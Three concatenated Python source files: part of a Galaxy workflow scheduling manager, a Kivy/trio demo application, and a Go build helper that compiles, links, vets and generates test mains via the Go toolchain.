EXCEPTION_MESSAGE_NO_DEFAULT_SCHEDULER = "Failed to define workflow schedulers - no workflow scheduler found for default id '%s'."
EXCEPTION_MESSAGE_DUPLICATE_SCHEDULERS = "Failed to define workflow schedulers - workflow scheduling plugin id '%s' duplicated."
class WorkflowSchedulingManager( object ):
""" A workflow scheduling manager based loosely on pattern established by
``galaxy.manager.JobManager``. Only schedules workflows on handler
processes.
"""
def __init__( self, app ):
self.app = app
self.__job_config = app.job_config
self.workflow_schedulers = {}
self.active_workflow_schedulers = {}
# Passive workflow schedulers won't need to be monitored I guess.
self.request_monitor = None
self.__plugin_classes = self.__plugins_dict()
self.__init_schedulers()
if self._is_workflow_handler():
log.debug("Starting workflow schedulers")
self.__start_schedulers()
if self.active_workflow_schedulers:
self.__start_request_monitor()
else:
# Process should not schedule workflows - do nothing.
pass
# Provide a handler config-like interface by delegating to job handler
# config. Perhaps it makes sense to let there be explicit workflow
# handlers?
def _is_workflow_handler( self ):
return self.app.is_job_handler()
def _get_handler( self ):
return self.__job_config.get_handler( None )
def shutdown( self ):
for workflow_scheduler in self.workflow_schedulers.itervalues():
try:
workflow_scheduler.shutdown()
except Exception:
log.exception( EXCEPTION_MESSAGE_SHUTDOWN )
if self.request_monitor:
try:
self.request_monitor.shutdown()
except Exception:
log.exception( "Failed to shutdown workflow request monitor." )
def queue( self, workflow_invocation, request_params ):
workflow_invocation.state = model.WorkflowInvocation.states.NEW
scheduler = request_params.get( "scheduler", None ) or self.default_scheduler_id
handler = self._get_handler()
log.info("Queueing workflow invocation for handler [%s]" % handler)
workflow_invocation.scheduler = scheduler
workflow_invocation.handler = handler
sa_session = self.app.model.context
sa_session.add( workflow_invocation )
sa_session.flush()
return workflow_invocation
def __start_schedulers( self ):
for workflow_scheduler in self.workflow_schedulers.itervalues():
workflow_scheduler.startup( self.app )
def __plugins_dict( self ):
return plugin_config.plugins_dict( galaxy.workflow.schedulers, 'plugin_type' )
def __init_schedulers( self ):
config_file = self.app.config.workflow_schedulers_config_file
use_default_scheduler = False
if not config_file:
log.info( "Not workflow schedulers plugin config file defined, using default scheduler." )
use_default_scheduler = True
elif not os.path.exists( config_file ):
log.info( "Cannot find workflow schedulers plugin config file '%s', using default scheduler." % config_file )
use_default_scheduler = True
if use_default_scheduler:
self.__init_default_scheduler()
else:
plugins_element = ElementTree.parse( config_file ).getroot()
self.__init_schedulers_for_element( plugins_element )
def __init_default_scheduler( self ):
self.default_scheduler_id = DEFAULT_SCHEDULER_ID
self.__init_plugin( DEFAULT_SCHEDULER_PLUGIN_TYPE )
def __init_schedulers_for_element( self, plugins_element ):
plugins_kwds = dict( plugins_element.items() )
self.default_scheduler_id = plugins_kwds.get( 'default', DEFAULT_SCHEDULER_ID )
for plugin_element in plugins_element:
plugin_type = plugin_element.tag
plugin_kwds = dict( plugin_element.items() )
workflow_scheduler_id = plugin_kwds.get( 'id', None )
self.__init_plugin( plugin_type, workflow_scheduler_id, **plugin_kwds )
if not self.workflow_schedulers:
raise Exception( EXCEPTION_MESSAGE_NO_SCHEDULERS )
if self.default_scheduler_id not in self.workflow_schedulers:
raise Exception( EXCEPTION_MESSAGE_NO_DEFAULT_SCHEDULER % self.default_scheduler_id )
def __init_plugin( self, plugin_type, workflow_scheduler_id=None, **kwds ):
workflow_scheduler_id = workflow_scheduler_id or self.default_scheduler_id
if workflow_scheduler_id in self.workflow_schedulers:
raise Exception( EXCEPTION_MESSAGE_DUPLICATE_SCHEDULERS % workflow_scheduler_id )
workflow_scheduler = self.__plugin_classes[ plugin_type ]( **kwds )
self.workflow_schedulers[ workflow_scheduler_id ] = workflow_scheduler
if isinstance( workflow_scheduler, galaxy.workflow.schedulers.ActiveWorkflowSchedulingPlugin ):
self.active_workflow_schedulers[ workflow_scheduler_id ] = workflow_scheduler
def __start_request_monitor( self ):
self.request_monitor = WorkflowRequestMonitor( self.app, self )
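# Illustrative sketch (not part of the original module): the rough shape of a
# workflow schedulers XML config that the scheduling manager above can consume.
# The root tag name and scheduler id are assumptions made for the example;
# element tags select the plugin type ('core' is the built-in default) and
# element attributes are passed to the plugin as keyword arguments.
_EXAMPLE_WORKFLOW_SCHEDULERS_XML = """
<workflow_schedulers default="core_scheduler">
    <core id="core_scheduler" />
</workflow_schedulers>
"""
def _example_parse_schedulers_config():
    return ElementTree.fromstring( _EXAMPLE_WORKFLOW_SCHEDULERS_XML )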
class WorkflowRequestMonitor( object ):
def __init__( self, app, workflow_scheduling_manager ):
self.app = app
self.active = True
self.workflow_scheduling_manager = workflow_scheduling_manager
self.monitor_thread = threading.Thread( name="WorkflowRequestMonitor.monitor_thread", target=self.__monitor )
self.monitor_thread.setDaemon( True )
self.monitor_thread.start()
def __monitor( self ):
to_monitor = self.workflow_scheduling_manager.active_workflow_schedulers
while self.active:
for workflow_scheduler_id, workflow_scheduler in to_monitor.iteritems():
if not self.active:
return
self.__schedule( workflow_scheduler_id, workflow_scheduler )
# TODO: wake if stopped
time.sleep(1)
def __schedule( self, workflow_scheduler_id, workflow_scheduler ):
invocation_ids = self.__active_invocation_ids( workflow_scheduler_id )
for invocation_id in invocation_ids:
self.__attempt_schedule( invocation_id, workflow_scheduler )
if not self.active:
return
def __attempt_schedule( self, invocation_id, workflow_scheduler ):
sa_session = self.app.model.context
workflow_invocation = sa_session.query( model.WorkflowInvocation ).get( invocation_id )
if not workflow_invocation or not workflow_invocation.active:
return False
try:
# This ensures we're only ever working on the 'first' active
# workflow invocation in a given history, to force sequential
# activation.
if self.app.config.history_local_serial_workflow_scheduling:
for i in workflow_invocation.history.workflow_invocations:
if i.active and i.id < workflow_invocation.id:
return False
workflow_scheduler.schedule( workflow_invocation )
except Exception:
# TODO: eventually fail this - or fail it right away?
log.exception( "Exception raised while attempting to schedule workflow request." )
return False
# A workflow was obtained and scheduled...
return True
def __active_invocation_ids( self, scheduler_id ):
sa_session = self.app.model.context
handler = self.app.config.server_name
return model.WorkflowInvocation.poll_active_workflow_ids(
sa_session,
scheduler=scheduler_id,
handler=handler,
)
def shutdown( self ):
self.active = False
|
combo_test_example.py
|
import trio
import time
from threading import Thread
from kivy.app import App
from kivy.lang import Builder
from kivy.clock import Clock
from kivy.properties import NumericProperty, StringProperty, BooleanProperty
from kivy_trio.to_kivy import async_run_in_kivy, EventLoopStoppedError, \
AsyncKivyBind
from kivy_trio.to_trio import kivy_run_in_async, mark, KivyEventCancelled
from kivy_trio.context import kivy_trio_context_manager, \
trio_context_manager, initialize_kivy_from_trio
kv = '''
BoxLayout:
spacing: '5dp'
orientation: 'vertical'
BoxLayout:
spacing: '5dp'
Button:
on_release: app.wait_async(float(delay.text or 0))
text: 'Press to wait'
TextInput:
id: delay
text: '1.5'
input_filter: 'float'
hint_text: 'delay'
Label:
text: 'measured delay: {}\\n{}'.format(app.delay, app.delay_msg)
BoxLayout:
spacing: '5dp'
Button:
on_release: app.trigger_async_error()
text: 'Trigger error:'
Label:
text: 'Error message: {}'.format(app.error_msg)
Label:
text: 'trio sent: {}'.format(app.trio_msg)
BoxLayout:
spacing: '5dp'
Button:
on_kv_post: app.press_btn = self
id: press_btn
text: 'Press me'
Label:
text: 'Trio says: button is {}'.format(app.pressing_button)
'''
class DemoApp(App):
delay = NumericProperty(0)
delay_msg = StringProperty('')
error_msg = StringProperty('')
trio_msg = StringProperty('')
pressing_button = BooleanProperty(False)
press_btn = None
count = 0
def build(self):
return Builder.load_string(kv)
async def sleep_for(self, delay):
await trio.sleep(delay)
self.count += 1
return f'Thanks for nap {self.count}!!'
@kivy_run_in_async
def wait_async(self, delay):
self.delay = 0
self.delay_msg = ''
ts = time.perf_counter()
try:
self.delay_msg = yield mark(self.sleep_for, delay)
except KivyEventCancelled:
print('cancelled wait_async while it was waiting')
return
self.delay = time.perf_counter() - ts
async def raise_error(self):
await trio.sleep(2)
raise ValueError('Who has woken me at this hour???')
@kivy_run_in_async
def trigger_async_error(self):
self.error_msg = ''
try:
yield mark(self.raise_error)
except ValueError as e:
self.error_msg = str(e)
except KivyEventCancelled:
print('cancelled trigger_async_error while it was waiting')
@async_run_in_kivy
def send_kivy_message(self, packet):
self.trio_msg = f'beetle juice {packet} times'
async def send_msg_to_kivy_from_trio(self):
i = 0
while True:
try:
await self.send_kivy_message(i)
except EventLoopStoppedError:
# kivy stopped so nothing more to do
return
i += 1
await trio.sleep(1.3)
@async_run_in_kivy
def set_button_state(self, state):
self.pressing_button = state
async def track_press_button(self):
while self.press_btn is None:
# wait for app to be set up
await trio.sleep(.1)
async with AsyncKivyBind(obj=self.press_btn, name='state') as queue:
async for value in queue:
await self.set_button_state(value[1])
def _trio_thread_target(self):
async def runner():
with trio_context_manager():
await initialize_kivy_from_trio()
async with trio.open_nursery() as nursery:
nursery.start_soon(self.send_msg_to_kivy_from_trio)
nursery.start_soon(self.track_press_button)
trio.run(runner)
def run_threading(self):
thread = Thread(target=self._trio_thread_target)
# start the trio thread once kivy's widgets are set up and ready
Clock.schedule_once(lambda x: thread.start())
self.run()
# wait until trio thread is done
thread.join()
async def run_app(self):
with kivy_trio_context_manager():
async with trio.open_nursery() as nursery:
nursery.start_soon(self.async_run, 'trio')
nursery.start_soon(self.send_msg_to_kivy_from_trio)
nursery.start_soon(self.track_press_button)
if __name__ == '__main__':
trio.run(DemoApp().run_app)
# DemoApp().run_threading()
|
go_tool.py
|
from __future__ import absolute_import
import argparse
import copy
import json
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import six
from functools import reduce
import process_command_files as pcf
arc_project_prefix = 'a.yandex-team.ru/'
std_lib_prefix = 'contrib/go/_std/src/'
vendor_prefix = 'vendor/'
vet_info_ext = '.vet.out'
vet_report_ext = '.vet.txt'
FIXED_CGO1_SUFFIX='.fixed.cgo1.go'
COMPILE_OPTIMIZATION_FLAGS=('-N',)
def get_trimpath_args(args):
return ['-trimpath', args.trimpath] if args.trimpath else []
def preprocess_cgo1(src_path, dst_path, source_root):
with open(src_path, 'r') as f:
content = f.read()
content = content.replace('__ARCADIA_SOURCE_ROOT_PREFIX__', source_root)
with open(dst_path, 'w') as f:
f.write(content)
def preprocess_args(args):
# Temporary workaround for noauto
if args.cgo_srcs and len(args.cgo_srcs) > 0:
cgo_srcs_set = set(args.cgo_srcs)
args.srcs = [x for x in args.srcs if x not in cgo_srcs_set]
args.pkg_root = os.path.join(args.toolchain_root, 'pkg')
toolchain_tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
args.go_compile = os.path.join(toolchain_tool_root, 'compile')
args.go_cgo = os.path.join(toolchain_tool_root, 'cgo')
args.go_link = os.path.join(toolchain_tool_root, 'link')
args.go_asm = os.path.join(toolchain_tool_root, 'asm')
args.go_pack = os.path.join(toolchain_tool_root, 'pack')
args.go_vet = os.path.join(toolchain_tool_root, 'vet') if args.vet is True else args.vet
args.output = os.path.normpath(args.output)
args.vet_report_output = vet_report_output_name(args.output, args.vet_report_ext)
args.trimpath = None
if args.debug_root_map:
roots = {'build': args.build_root, 'source': args.source_root, 'tools': args.tools_root}
replaces = []
for root in args.debug_root_map.split(';'):
src, dst = root.split('=', 1)
assert src in roots
replaces.append('{}=>{}'.format(roots[src], dst))
del roots[src]
assert len(replaces) > 0
args.trimpath = ';'.join(replaces)
args.build_root = os.path.normpath(args.build_root)
args.build_root_dir = args.build_root + os.path.sep
args.source_root = os.path.normpath(args.source_root)
args.source_root_dir = args.source_root + os.path.sep
args.output_root = os.path.normpath(args.output_root)
args.import_map = {}
args.module_map = {}
if args.cgo_peers:
args.cgo_peers = [x for x in args.cgo_peers if not x.endswith('.fake.pkg')]
assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
# add lexical order by basename for go sources
args.srcs.sort(key=lambda x: os.path.basename(x))
if args.test_srcs:
args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
del args.test_srcs
if args.xtest_srcs:
args.xtest_srcs.sort(key=lambda x: os.path.basename(x))
# compute root relative module dir path
assert args.output is None or args.output_root == os.path.dirname(args.output)
assert args.output_root.startswith(args.build_root_dir)
args.module_path = args.output_root[len(args.build_root_dir):]
args.source_module_dir = os.path.join(args.source_root, args.module_path) + os.path.sep
assert len(args.module_path) > 0
args.import_path, args.is_std = get_import_path(args.module_path)
assert args.asmhdr is None or args.word == 'go'
srcs = []
for f in args.srcs:
if f.endswith(FIXED_CGO1_SUFFIX) and f.startswith(args.build_root_dir):
path = os.path.join(args.output_root, '{}.cgo1.go'.format(os.path.basename(f[:-len(FIXED_CGO1_SUFFIX)])))
srcs.append(path)
preprocess_cgo1(f, path, args.source_root)
else:
srcs.append(f)
args.srcs = srcs
classify_srcs(args.srcs, args)
def compare_versions(version1, version2):
def last_index(version):
index = version.find('beta')
return len(version) if index < 0 else index
v1 = tuple(x.zfill(8) for x in version1[:last_index(version1)].split('.'))
v2 = tuple(x.zfill(8) for x in version2[:last_index(version2)].split('.'))
if v1 == v2:
return 0
return 1 if v1 < v2 else -1
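# Illustrative sketch (not part of the original tool): documents the contract of
# compare_versions() above - 0 when the versions match, 1 when version1 is older
# than version2, -1 otherwise, with any 'beta' suffix ignored. The version
# numbers below are arbitrary.
def _example_compare_versions():
    assert compare_versions('1.16', '1.16') == 0
    assert compare_versions('1.16', '1.18') == 1   # 1.16 is older than 1.18
    assert compare_versions('1.18', '1.16beta1') == -1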
def get_symlink_or_copyfile():
os_symlink = getattr(os, 'symlink', None)
if os_symlink is None:
os_symlink = shutil.copyfile
return os_symlink
def copy_args(args):
return copy.copy(args)
def get_vendor_index(import_path):
index = import_path.rfind('/' + vendor_prefix)
if index < 0:
index = 0 if import_path.startswith(vendor_prefix) else index
else:
index = index + 1
return index
def get_import_path(module_path):
assert len(module_path) > 0
import_path = module_path.replace('\\', '/')
is_std_module = import_path.startswith(std_lib_prefix)
if is_std_module:
import_path = import_path[len(std_lib_prefix):]
elif import_path.startswith(vendor_prefix):
import_path = import_path[len(vendor_prefix):]
else:
import_path = arc_project_prefix + import_path
assert len(import_path) > 0
return import_path, is_std_module
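# Illustrative sketch (not part of the original tool): how get_import_path()
# maps arcadia module paths to Go import paths; the module paths below are made
# up for the example.
def _example_get_import_path():
    assert get_import_path('contrib/go/_std/src/fmt') == ('fmt', True)
    assert get_import_path('vendor/golang.org/x/example') == ('golang.org/x/example', False)
    assert get_import_path('my/project/lib') == (arc_project_prefix + 'my/project/lib', False)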
def call(cmd, cwd, env=None):
# sys.stderr.write('{}\n'.format(' '.join(cmd)))
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def classify_srcs(srcs, args):
args.go_srcs = [x for x in srcs if x.endswith('.go')]
args.asm_srcs = [x for x in srcs if x.endswith('.s')]
args.objects = [x for x in srcs if x.endswith('.o') or x.endswith('.obj')]
args.symabis = [x for x in srcs if x.endswith('.symabis')]
args.sysos = [x for x in srcs if x.endswith('.syso')]
def get_import_config_info(peers, gen_importmap, import_map={}, module_map={}):
info = {'importmap': [], 'packagefile': [], 'standard': {}}
if gen_importmap:
for key, value in six.iteritems(import_map):
info['importmap'].append((key, value))
for peer in peers:
peer_import_path, is_std = get_import_path(os.path.dirname(peer))
if gen_importmap:
index = get_vendor_index(peer_import_path)
if index >= 0:
index += len(vendor_prefix)
info['importmap'].append((peer_import_path[index:], peer_import_path))
info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
if is_std:
info['standard'][peer_import_path] = True
for key, value in six.iteritems(module_map):
info['packagefile'].append((key, value))
return info
def create_import_config(peers, gen_importmap, import_map={}, module_map={}):
lines = []
info = get_import_config_info(peers, gen_importmap, import_map, module_map)
for key in ('importmap', 'packagefile'):
for item in info[key]:
lines.append('{} {}={}'.format(key, *item))
if len(lines) > 0:
lines.append('')
content = '\n'.join(lines)
# sys.stderr.writelines('{}\n'.format(l) for l in lines)
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(content)
return f.name
return None
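# Illustrative sketch (not part of the original tool): the shape of the importcfg
# file written by create_import_config() above - one '<kind> <key>=<value>' line
# per entry plus a trailing empty line. The package names and paths are made up.
_EXAMPLE_IMPORTCFG = '\n'.join([
    'importmap example.org/alias=example.org/real/import/path',
    'packagefile example.org/real/import/path=/build/root/example/pkg.a',
    '',
])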
def create_embed_config(args):
data = {
'Patterns': {},
'Files': {},
}
for info in args.embed:
pattern = info[0]
if pattern.endswith('/**/*'):
pattern = pattern[:-3]
files = {os.path.relpath(f, args.source_module_dir): f for f in info[1:]}
data['Patterns'][pattern] = list(files.keys())
data['Files'].update(files)
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
with tempfile.NamedTemporaryFile(delete=False, suffix='.embedcfg') as f:
f.write(json.dumps(data))
return f.name
def vet_info_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_info_ext)
def vet_report_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_report_ext)
def get_source_path(args):
return args.test_import_path or args.module_path
def gen_vet_info(args):
import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
info = get_import_config_info(args.peers, True, args.import_map, args.module_map)
import_map = dict(info['importmap'])
# FIXME(snermolaev): it seems that adding an import map entry for the 'fake' package
# doesn't do any harm (it needs to be revised later)
import_map['unsafe'] = 'unsafe'
for (key, _) in info['packagefile']:
if key not in import_map:
import_map[key] = key
data = {
'ID': import_path,
'Compiler': 'gc',
'Dir': os.path.join(args.source_root, get_source_path(args)),
'ImportPath': import_path,
'GoFiles': [x for x in args.go_srcs if x.endswith('.go')],
'NonGoFiles': [x for x in args.go_srcs if not x.endswith('.go')],
'ImportMap': import_map,
'PackageFile': dict(info['packagefile']),
'Standard': dict(info['standard']),
'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
'VetxOnly': False,
'VetxOutput': vet_info_output_name(args.output),
'SucceedOnTypecheckFailure': False
}
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
return data
def create_vet_config(args, info):
with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg') as f:
f.write(json.dumps(info))
return f.name
def decode_vet_report(json_report):
report = ''
if json_report:
try:
full_diags = json.JSONDecoder(encoding='UTF-8').decode(json_report)
except ValueError:
report = json_report
else:
messages = []
for _, module_diags in six.iteritems(full_diags):
for _, type_diags in six.iteritems(module_diags):
for diag in type_diags:
messages.append(u'{}: {}'.format(diag['posn'], diag['message']))
report = '\n'.join(sorted(messages)).encode('UTF-8')
return report
def dump_vet_report(args, report):
if report:
report = report.replace(args.build_root, '$B')
report = report.replace(args.source_root, '$S')
with open(args.vet_report_output, 'w') as f:
f.write(report)
def read_vet_report(args):
assert args
report = ''
if os.path.exists(args.vet_report_output):
with open(args.vet_report_output, 'r') as f:
report += f.read()
return report
def dump_vet_report_for_tests(args, *test_args_list):
dump_vet_report(args, reduce(lambda x, y: x + read_vet_report(y), [_f for _f in test_args_list if _f], ''))
def do_vet(args):
assert args.vet
info = gen_vet_info(args)
vet_config = create_vet_config(args, info)
cmd = [args.go_vet, '-json']
if args.vet_flags:
cmd.extend(args.vet_flags)
cmd.append(vet_config)
# sys.stderr.write('>>>> [{}]\n'.format(' '.join(cmd)))
p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.source_root)
vet_out, vet_err = p_vet.communicate()
report = decode_vet_report(vet_out) if vet_out else ''
dump_vet_report(args, report)
if p_vet.returncode:
raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
import_path, is_std_module = args.import_path, args.is_std
cmd = [
args.go_compile,
'-o',
args.output,
'-p',
import_path,
'-D',
'""',
'-goversion',
'go{}'.format(args.goversion)
]
cmd.extend(get_trimpath_args(args))
if is_std_module:
cmd.append('-std')
if import_path == 'runtime' or import_path.startswith('runtime/internal/'):
cmd.append('-+')
import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
else:
if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
pass
else:
cmd.append('-complete')
if args.embed and compare_versions('1.16', args.goversion) >= 0:
embed_config_name = create_embed_config(args)
cmd.extend(['-embedcfg', embed_config_name])
if args.asmhdr:
cmd += ['-asmhdr', args.asmhdr]
# Use .symabis (starting from 1.12 version)
if args.symabis:
cmd += ['-symabis'] + args.symabis
# If 1.12 <= version < 1.13 we have to pass -allabis for 'runtime' and 'runtime/internal/atomic'
# if compare_versions('1.13', args.goversion) >= 0:
# pass
# elif import_path in ('runtime', 'runtime/internal/atomic'):
# cmd.append('-allabis')
compile_workers = '4'
if args.compile_flags:
if import_path == 'runtime' or import_path.startswith('runtime/'):
cmd.extend(x for x in args.compile_flags if x not in COMPILE_OPTIMIZATION_FLAGS)
else:
cmd.extend(args.compile_flags)
if any([x in ('-race', '-shared') for x in args.compile_flags]):
compile_workers = '1'
cmd += ['-pack', '-c={}'.format(compile_workers)]
cmd += args.go_srcs
call(cmd, args.build_root)
class VetThread(threading.Thread):
def __init__(self, target, args):
super(VetThread, self).__init__(target=target, args=args)
self.exc_info = None
def run(self):
try:
super(VetThread, self).run()
except:
self.exc_info = sys.exc_info()
def join_with_exception(self, reraise_exception):
self.join()
if reraise_exception and self.exc_info:
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def do_compile_go(args):
raise_exception_from_vet = False
if args.vet:
run_vet = VetThread(target=do_vet, args=(args,))
run_vet.start()
try:
_do_compile_go(args)
raise_exception_from_vet = True
finally:
if args.vet:
run_vet.join_with_exception(raise_exception_from_vet)
def do_compile_asm(args):
def need_compiling_runtime(import_path):
return import_path in ('runtime', 'reflect', 'syscall') or import_path.startswith('runtime/internal/')
assert(len(args.srcs) == 1 and len(args.asm_srcs) == 1)
cmd = [args.go_asm]
cmd += get_trimpath_args(args)
cmd += ['-I', args.output_root, '-I', os.path.join(args.pkg_root, 'include')]
cmd += ['-D', 'GOOS_' + args.targ_os, '-D', 'GOARCH_' + args.targ_arch, '-o', args.output]
# TODO: This is just a quick fix to start work on 1.16 support
if compare_versions('1.16', args.goversion) >= 0:
cmd += ['-p', args.import_path]
if need_compiling_runtime(args.import_path):
cmd += ['-compiling-runtime']
if args.asm_flags:
cmd += args.asm_flags
cmd += args.asm_srcs
call(cmd, args.build_root)
def do_link_lib(args):
if len(args.asm_srcs) > 0:
asmargs = copy_args(args)
asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
do_compile_go(asmargs)
for src in asmargs.asm_srcs:
asmargs.srcs = [src]
asmargs.asm_srcs = [src]
asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
do_compile_asm(asmargs)
args.objects.append(asmargs.output)
else:
do_compile_go(args)
if args.objects:
cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
call(cmd, args.build_root)
def do_link_exe(args):
assert args.extld is not None
assert args.non_local_peers is not None
compile_args = copy_args(args)
compile_args.output = os.path.join(args.output_root, 'main.a')
compile_args.real_import_path = compile_args.import_path
compile_args.import_path = 'main'
if args.vcs and os.path.isfile(compile_args.vcs):
build_info = os.path.join('library', 'go', 'core', 'buildinfo')
if any([x.startswith(build_info) for x in compile_args.peers]):
compile_args.go_srcs.append(compile_args.vcs)
do_link_lib(compile_args)
cmd = [args.go_link, '-o', args.output]
import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
if args.link_flags:
cmd += args.link_flags
if args.mode in ('exe', 'test'):
cmd.append('-buildmode=exe')
elif args.mode == 'dll':
cmd.append('-buildmode=c-shared')
else:
assert False, 'Unexpected mode: {}'.format(args.mode)
cmd.append('-extld={}'.format(args.extld))
extldflags = []
if args.extldflags is not None:
filter_musl = bool
if args.musl:
cmd.append('-linkmode=external')
extldflags.append('-static')
filter_musl = lambda x: not x in ('-lc', '-ldl', '-lm', '-lpthread', '-lrt')
extldflags += [x for x in args.extldflags if filter_musl(x)]
cgo_peers = []
if args.cgo_peers is not None and len(args.cgo_peers) > 0:
is_group = args.targ_os == 'linux'
if is_group:
cgo_peers.append('-Wl,--start-group')
cgo_peers.extend(args.cgo_peers)
if is_group:
cgo_peers.append('-Wl,--end-group')
try:
index = extldflags.index('--cgo-peers')
extldflags = extldflags[:index] + cgo_peers + extldflags[index+1:]
except ValueError:
extldflags.extend(cgo_peers)
if len(extldflags) > 0:
cmd.append('-extldflags={}'.format(' '.join(extldflags)))
cmd.append(compile_args.output)
call(cmd, args.build_root)
def gen_cover_info(args):
lines = []
lines.extend([
"""
var (
coverCounters = make(map[string][]uint32)
coverBlocks = make(map[string][]testing.CoverBlock)
)
""",
'func init() {',
])
for var, file in (x.split(':') for x in args.cover_info):
lines.append(' coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
lines.extend([
'}',
"""
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
panic("coverage: mismatched sizes")
}
if coverCounters[fileName] != nil {
// Already registered.
return
}
coverCounters[fileName] = counter
block := make([]testing.CoverBlock, len(counter))
for i := range counter {
block[i] = testing.CoverBlock{
Line0: pos[3*i+0],
Col0: uint16(pos[3*i+2]),
Line1: pos[3*i+1],
Col1: uint16(pos[3*i+2]>>16),
Stmts: numStmts[i],
}
}
coverBlocks[fileName] = block
}
""",
])
return lines
def filter_out_skip_tests(tests, skip_tests):
skip_set = set()
star_skip_set = set()
for t in skip_tests:
work_set = star_skip_set if '*' in t else skip_set
work_set.add(t)
re_star_tests = None
if len(star_skip_set) > 0:
re_star_tests = re.compile(re.sub(r'(\*)+', r'.\1', '^({})$'.format('|'.join(star_skip_set))))
return [x for x in tests if not (x in skip_tests or re_star_tests and re_star_tests.match(x))]
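# Illustrative sketch (not part of the original tool): how filter_out_skip_tests()
# above handles exact names versus '*' patterns; the test names are made up.
def _example_filter_out_skip_tests():
    tests = ['TestFoo', 'TestFooBar', 'TestBaz', 'BenchmarkFoo']
    kept = filter_out_skip_tests(tests, ['TestBaz', 'TestFoo*'])
    assert kept == ['BenchmarkFoo']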
def gen_test_main(args, test_lib_args, xtest_lib_args):
assert args and (test_lib_args or xtest_lib_args)
test_miner = args.test_miner
test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
is_cover = args.cover_info and len(args.cover_info) > 0
# Prepare GOPATH
# $BINDIR
# |- __go__
# |- src
# |- pkg
# |- ${TARGET_OS}_${TARGET_ARCH}
go_path_root = os.path.join(args.output_root, '__go__')
test_src_dir = os.path.join(go_path_root, 'src')
target_os_arch = '_'.join([args.targ_os, args.targ_arch])
test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
os.makedirs(test_pkg_dir)
my_env = os.environ.copy()
my_env['GOROOT'] = ''
my_env['GOPATH'] = go_path_root
my_env['GOARCH'] = args.targ_arch
my_env['GOOS'] = args.targ_os
tests = []
xtests = []
os_symlink = get_symlink_or_copyfile()
# Get the list of "internal" tests
if test_lib_args:
os.makedirs(os.path.join(test_src_dir, test_module_path))
os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
tests = [x for x in (call(cmd, test_lib_args.output_root, my_env) or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
tests = filter_out_skip_tests(tests, args.skip_tests)
test_main_found = '#TestMain' in tests
# Get the list of "external" tests
if xtest_lib_args:
xtest_module_path = xtest_lib_args.import_path
os.makedirs(os.path.join(test_src_dir, xtest_module_path))
os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
xtests = [x for x in (call(cmd, xtest_lib_args.output_root, my_env) or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
xtests = filter_out_skip_tests(xtests, args.skip_tests)
xtest_main_found = '#TestMain' in xtests
test_main_package = None
if test_main_found and xtest_main_found:
assert False, 'multiple definition of TestMain'
elif test_main_found:
test_main_package = '_test'
elif xtest_main_found:
test_main_package = '_xtest'
shutil.rmtree(go_path_root)
lines = ['package main', '', 'import (']
if test_main_package is None:
lines.append(' "os"')
lines.extend([' "testing"', ' "testing/internal/testdeps"'])
if len(tests) > 0:
lines.append(' _test "{}"'.format(test_module_path))
elif test_lib_args:
lines.append(' _ "{}"'.format(test_module_path))
if len(xtests) > 0:
lines.append(' _xtest "{}"'.format(xtest_module_path))
elif xtest_lib_args:
lines.append(' _ "{}"'.format(xtest_module_path))
if is_cover:
lines.append(' _cover0 "{}"'.format(test_module_path))
lines.extend([')', ''])
for kind in ['Test', 'Benchmark', 'Example']:
lines.append('var {}s = []testing.Internal{}{{'.format(kind.lower(), kind))
for test in [x for x in tests if x.startswith(kind)]:
lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
for test in [x for x in xtests if x.startswith(kind)]:
lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
lines.extend(['}', ''])
if is_cover:
lines.extend(gen_cover_info(args))
lines.append('func main() {')
if is_cover:
lines.extend([
' testing.RegisterCover(testing.Cover{',
' Mode: "set",',
' Counters: coverCounters,',
' Blocks: coverBlocks,',
' CoveredPackages: "",',
' })',
])
lines.extend([
' m := testing.MainStart(testdeps.TestDeps{}, tests, benchmarks, examples)',
'',
])
if test_main_package:
lines.append(' {}.TestMain(m)'.format(test_main_package))
else:
lines.append(' os.Exit(m.Run())')
lines.extend(['}', ''])
content = '\n'.join(lines)
# sys.stderr.write('{}\n'.format(content))
return content
